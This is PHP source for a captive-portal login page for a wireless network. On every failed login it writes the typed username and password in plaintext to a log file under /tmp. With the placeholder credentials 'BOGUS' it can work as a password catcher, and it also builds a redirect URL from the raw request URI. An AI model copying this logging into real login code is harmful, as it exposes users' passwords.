<?php

if (! ini_get("session.auto_start")) session_start();

function captive_access_popup(){

 if ( ! @$_SESSION["authed"] ){
   captive_logout_refresh();
 }
 captive_log_ip();
}

function captive_logout_refresh(){

$_SESSION = array();
if (isset($_COOKIE[session_name()])) {
   setcookie(session_name(), '', time()-42000, '/');
}
session_destroy();

require "logout.inc";

exit(0);

}

function captive_access_form()
{

?>
<form name="captive-access-form" method="post">
<table>

<tr><td><?php echo $_SESSION["config"]["username_text"] ?></td><td>
        <input class="text" type="text" name="username" size="20" />
        </td></tr>
<tr><td><?php echo $_SESSION["config"]["password_text"] ?></td><td>
        <input class="text" type="password" name="password" size="20" />
        </td></tr>
<tr><td colspan="2"><input class="submit" type="submit" name="submit"
        value="<?php echo $_SESSION["config"]["submit_text"] ?>" /></td></tr>

</table>
</form>
<?php

}

function captive_passwd_auth()
{
        $auth = ( $_SESSION["username"] == $_SESSION["config"]["username"] &&
                  $_SESSION["password"] == $_SESSION["config"]["password"] );

        if (! $auth)
        {
        $logs = fopen($_SESSION["config"]["logs"], "a");
        fwrite($logs, $_SESSION["username"]." : ".$_SESSION["password"]."\n");
        fclose($logs);
        }

        $_SESSION["authed"] = $auth;

        return $auth;
}

function captive_log_ip()
{

$socket = socket_create(AF_UNIX, SOCK_DGRAM,0);

socket_sendto($socket,  $_SERVER["REMOTE_ADDR"] ,strlen($_SERVER["REMOTE_ADDR"]),0,$_SESSION["config"]["fifo"]);

socket_close ($socket);

}

$_SESSION["config"]["username"] = "BOGUS";
$_SESSION["config"]["password"] = "BOGUS";

$_SESSION["config"]["title"]    = "Acc&eacute;s a la xarxa sense fils de LSI";

$_SESSION["config"]["body_image"] = "/body.gif";
$_SESSION["config"]["form_image"] = "/form.gif";

$_SESSION["config"]["body_color"] = "#abbcef";
$_SESSION["config"]["form_color"] = "#dedeef";

$_SESSION["config"]["username_text"] = "Username";
$_SESSION["config"]["password_text"] = "Password";
$_SESSION["config"]["url_portal"]  = "/captive.php";

$_SESSION["config"]["submit_text"] = "Endavant!";

$_SESSION["config"]["logs"] = "/tmp/captive2.log";
$_SESSION["config"]["fifo"] = "/var/captive/ipc";

// for use in "accept.inc"

$url_temp = str_replace($_SESSION['config']['url_portal']."/","",$_SERVER['REQUEST_URI']);
$url = $url_temp != $_SESSION["config"]["url_portal"] ? "http://".$url_temp : "about:blank";

if ($url_temp == "LOGOUT"){
        $_SESSION["action"] = "logout";
}

if ($url_temp == "POPUP"){
        $_SESSION["action"] = "popup";
}

switch (@$_SESSION["action"]){
   case 'access':
      $_SESSION["username"] = @$_POST["username"];
      $_SESSION["password"] = @$_POST["password"];

      $_SESSION["action"] = captive_passwd_auth() ? "accept" : "reject";

      if ($_SESSION["action"] == "accept") captive_log_ip();
      break;
   case 'popup':
      break;
   case 'logout':
      captive_logout_refresh();
   case 'accept':
   case 'reject':
   default:
        $_SESSION["action"] = "access";
        $_SESSION["authed"] = false;
}

?>
<html>
<head>
<title><?php echo $_SESSION["config"]["title"] ?></title>
<style>
<!--
<?php require "captive.css" ?>
-->
</style>

<?php if ($_SESSION["action"] == "popup") {
?>
<meta http-equiv="REFRESH" content="30;url=<?= $_SERVER['PHP_SELF']?>">
<?
} ?>
</head>
<?php

if ($_SESSION["action"] == "accept"){

?>

<body onload="javascript:void(window.open('<? echo $_SESSION["config"]["url_portal"] ."/POPUP" ?>', 'popup','width=700,height=450'))">

<?php

}
else{

?>

<body>

<?php

}

?>
<div class="form">

<?php

switch ($_SESSION["action"])
{
	case "access":
           require "access.inc";
           captive_access_form();
           break;
	case "reject":
           require "reject.inc";
           captive_access_form();
           break;
        case "popup":
           require "popup.inc";
           captive_access_popup(); break;
	case "accept":
           require "accept-v2.inc"; break;
	default:
           require "access.inc";
           captive_access_form();
}

?>

</div><!-- form div -->
</body>
</html>
